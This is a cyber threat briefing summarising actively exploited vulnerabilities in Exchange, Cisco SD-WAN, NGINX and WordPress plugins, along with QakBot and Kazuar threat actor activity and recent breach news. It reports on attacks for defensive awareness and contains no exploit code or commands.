Cyber Threat Briefing
DELTA — CHANGES SINCE LAST BRIEFING
- New KEV entry: Microsoft Exchange Server XSS (CVE-2026-42897) added by CISA and confirmed actively exploited.
- New KEV entry nearing remediation deadline: Cisco Catalyst SD-WAN Controller auth bypass (CVE-2026-20182) actively exploited.
- NGINX CVE-2026-42945 disclosed and reported exploited in the wild, enabling crashes and potential RCE.
- Funnel Builder WordPress plugin vulnerability now confirmed under active exploitation for checkout skimming.
THREAT LEVEL ASSESSMENT
The overall threat level is CRITICAL due to concurrent active exploitation of high-impact vulnerabilities, including Microsoft Exchange (CVE-2026-42897), Cisco SD-WAN (CVE-2026-20182), and NGINX (CVE-2026-42945), combined with widespread exploitation of WordPress plugin flaws and persistent activity from QakBot C2 infrastructure. Multiple critical CVEs enabling remote code execution and arbitrary file upload further elevate organizational risk. The threat landscape is characterized by rapid weaponization of newly disclosed vulnerabilities and ongoing supply chain compromises affecting major ecosystems.
CRITICAL VULNERABILITIES
| CVE | Product | CVSS | Status | Impact |
|---|---|---|---|---|
| CVE-2018-25320 | ACL Analytics 11.x–13.0.0.579 | 9.8 | Not in KEV | Arbitrary code execution via EXECUTE function, enabling PowerShell delivery and system‑level takeover. |
| CVE-2018-25332 | GitBucket 4.23.1 | 9.8 | Not in KEV | Unauthenticated RCE via weak token generation and malicious JAR upload. |
| CVE-2018-25335 | WordPress Plugin Peugeot Music 1.0 | 9.8 | Not in KEV | Unauthenticated arbitrary file upload enabling remote code execution. |
| CVE-2026-42897 | Microsoft Exchange Server | Not scored | KEV / Active Exploitation | XSS via crafted email enabling authenticated session hijacking and lateral movement. |
| CVE-2026-20182 | Cisco Catalyst SD-WAN Controller | 10.0 | KEV / Active Exploitation | Authentication bypass granting full admin access to SD-WAN control plane. |
ACTIVE EXPLOITS & KEV
| CVE | Vendor / Product | Description | Added | Remediation Due | Status |
|---|---|---|---|---|---|
| CVE-2026-42897 | Microsoft Exchange Server | Cross-site scripting enabling credential theft and post-auth exploitation. | 2026‑05‑15 | 2026‑05‑29 | Active exploitation confirmed |
| CVE-2026-20182 | Cisco Catalyst SD-WAN Controller | Authentication bypass granting admin control. | 2026‑05‑14 | 2026‑05‑17 | Active exploitation confirmed |
MALWARE & THREAT ACTORS
QakBot: Feodo Tracker lists an active C2 server at 50.16.16.211:443, online since December 2025. QakBot remains a modular banking trojan leveraged for credential harvesting, lateral movement, and ransomware staging. Active C2 suggests ongoing botnet operations and potential resurgence following prior takedown activity.
State-linked activity: Reports indicate Russian-affiliated Secret Blizzard has upgraded the Kazuar backdoor into a modular peer-to-peer botnet, enhancing stealth, data collection, and long-term persistence. Turla is likewise noted deploying an evolved Kazuar variant with expanded capabilities.
Financially motivated actors: Funnel Builder exploitation continues, injecting malicious JavaScript into WooCommerce checkout flows to skim credit card data at scale. Supply chain attacks persist, including the node‑ipc npm compromise targeting credential exfiltration.
CYBER NEWS DIGEST
CISA adds Microsoft Exchange CVE‑2026‑42897 to KEV (CISA Alerts). The XSS flaw in on‑prem Exchange is under active exploitation via crafted emails. Attackers can steal session tokens and move laterally within domains. Organizations must patch before the May 29 deadline.
Cisco SD-WAN Controller breach activity continues (The Hacker News / Dark Reading). The maximum‑severity authentication bypass vulnerability (CVE‑2026‑20182) is confirmed exploited to gain administrative access. CISA added it to KEV with remediation due immediately, underscoring widespread exploitation risk across enterprise SD‑WAN deployments.
NGINX CVE‑2026‑42945 exploited in the wild (The Hacker News). A newly disclosed vulnerability impacting NGINX Plus and NGINX Open is being actively exploited. The flaw causes worker process crashes and may enable RCE depending on configuration, with rapid weaponization following disclosure.
Grafana GitHub token breach results in full codebase theft (The Hacker News). Attackers obtained a GitHub token granting repository access, downloaded internal source code, and attempted extortion. No customer data exposure has yet been reported, but the event highlights persistent supply chain vulnerabilities.
Funnel Builder WordPress plugin exploited for checkout skimming (Bleeping Computer / The Hacker News). A critical vulnerability in Funnel Builder is actively abused to inject malicious JavaScript into WooCommerce environments. Attackers harvest payment data directly from checkout pages. The exploitation wave is broad and ongoing.
Kazuar backdoor evolves into modular P2P botnet (Bleeping Computer / The Hacker News). Russian state‑sponsored operators have significantly upgraded the long‑running Kazuar implant. The P2P architecture reduces reliance on centralized infrastructure, complicating detection and takedown efforts.
Canvas breach impacts U.S. schools and universities (Krebs on Security). A major extortion attack disrupted the Canvas platform nationwide, halting coursework and prompting congressional scrutiny. The ShinyHunters group reportedly reached an “agreement” with the vendor following data theft claims.
Copy.Fail: severe Linux kernel LPE (Schneier on Security). A major local privilege escalation vulnerability disclosed in late April 2026 provides attackers with reliable escalation paths on unpatched systems. The flaw is widely regarded as one of the most serious kernel issues in years.